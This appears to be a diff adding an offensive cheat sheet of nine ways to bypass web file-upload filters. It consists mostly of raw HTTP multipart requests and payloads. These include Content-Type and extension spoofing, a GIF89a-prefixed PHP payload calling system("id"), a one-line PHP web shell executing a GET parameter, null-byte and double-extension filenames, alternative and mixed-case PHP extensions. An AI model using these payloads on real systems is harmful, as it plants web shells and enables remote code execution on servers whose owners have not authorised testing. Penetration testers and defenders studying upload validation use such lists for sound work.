Bypass File Upload [1]

Add bypass file upload tips and add 9 tips

BypassFileUpload.md

@@ -0,0 +1,83 @@
+# Bypass File Upload
+1. Change the ContentType
+```
+POST /images/upload/ HTTP/1.1
+Host: target.com
+[...]
+
+---------------------------829348923824
+Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
+Content-Type: application/x-php
+```
+Change the Content-Type
+```
+POST /images/upload/ HTTP/1.1
+Host: target.com
+[...]
+
+---------------------------829348923824
+Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
+Content-Type: image/jpeg
+```
+
+2. Try to change the extension when send the request, for example in here you cant upload file with ext php but you can upload jpg file
+```
+POST /images/upload/ HTTP/1.1
+Host: target.com
+[...]
+
+---------------------------829348923824
+Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpg"
+Content-Type: application/x-php
+```
+Change the request to this
+```
+POST /images/upload/ HTTP/1.1
+Host: target.com
+[...]
+
+---------------------------829348923824
+Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
+Content-Type: application/x-php
+```
+
+3. Upload the payload, but start with GIF89a; and
+```
+POST /images/upload/ HTTP/1.1
+Host: target.com
+[...]
+
+---------------------------829348923824
+Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
+Content-Type: image/gif
+
+GIF89a; <?php system("id") ?>
+```
+And dont forget to change the content-type to image/gif
+
+4. Bypass content length validation, it can be bypassed using small payload
+```
+(<?=`$_GET[x]`?>)
+```
+
+5. Using null byte in filename
+```
+file.php%00.gif
+```
+
+6. Using double extensions for the uploaded file
+```
+file.jpg.php
+```
+
+7.  Uploading an unpopular php extensions (php4,php5,php6,phtml)
+```
+file.php5
+```
+
+8. Try to randomly capitalizes the file extension
+```
+file.pHP5
+```
+
+9. Mix the tips!